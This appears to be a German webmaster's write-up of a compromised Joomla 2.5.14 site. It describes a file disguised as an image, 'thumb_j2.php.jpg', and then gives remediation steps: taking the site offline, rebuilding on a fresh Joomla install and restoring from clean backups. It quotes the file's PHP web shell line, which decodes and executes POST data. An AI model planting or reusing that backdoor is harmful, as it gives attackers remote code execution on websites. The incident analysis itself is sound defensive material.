Spam - Bilddatei: thumb_j2.php.jpg

thumb_j2.php.jpg

Die Datei thumb_j2.php5.jpg gefunden im Verzeichnis images gehört jedenfalls nicht dorthin. Das Bild enthält zudem den nachfolgenden Code:
<?php @assert(@base64_decode(@str_rot13($_POST["data"])));?>
Unabhängig davon ist die Datei ein Bild und wird als solches angezeigt.

Wie ist die Datei auf den Server gekommmen?

Im konkreten Fall wurde die befallene Homepage in Joomla 2.5.14 erstellt und seit der Erstellung nicht upgedatet.

Maßnahmen

Wer auf seinem Server Dateien findet, die dort nichts zu suchen haben und potentiell gefährlich sind, muss schnell handeln. Zunächst gilt es die Gefahr zu beseitigen.

Homepage vom Netz nehmen!

Das Offline setzen der Homepage allein genügt nicht, weil die bereits auf dem Server bzw. Webspace eingeschleusten Dateien außerhalb von Joomla aufgerufen werden.

Ein Passwortschutz über den gesamten Webspace ist sinnvoll.

Wenn dies nicht möglich ist oder man gerade nicht weiß, wie es geht, kann man die Seite durch den Support beim Hoster offline schalten lassen.

Letztendlich ist es gerade bei größeren CMS-Sysemen wie Joomla, Typo3 oder WordPress nicht möglich eine befallene Seite komplett vom Schadcode zu befreien.

Deshalb ist es immer sinnvoll rechzeitig vorzusorgen und die Webseiten regelmäßig zu sichern.

Im konkreten Fall wurde selbstverständlich das Update auf die aktuelle Joomla-Version durchgeführt. Dazu wurde eine lokale Kopie der Webseite und der Datenbank verwendet.

Um nicht doch potentiell gefährliche Dateien aus älteren Joomla-Versionen oder älteren Komponenten zu übernehmen wurde anschließend parallel eine frische Joomla-Installation in Joomla 3.6.5 erstellt und mit der vorhandenen Datenbank verknüpft.

Alle fehlenden Dateien, Bilder und Grafiken wurden einzeln geprüft und aus einer nicht befallenen Sicherung übertragen.

Alle Erweiterungen wurden neu installiert. Da alle verwendeten Erweiterungen als Upgrade installiert werden konnten, sind dabei die Daten erhalten geblieben. Andernfalls wäre anschließend das Rücksichern aus der "alten" Datenbank notwendig gewesen.

Anmerkung: Die fremden Dateien waren nicht das einzige Indiz für den Angriff auf den Server, es wurde auch in Joomla-Core - Dateien eingeschleuster Code gefunden.

^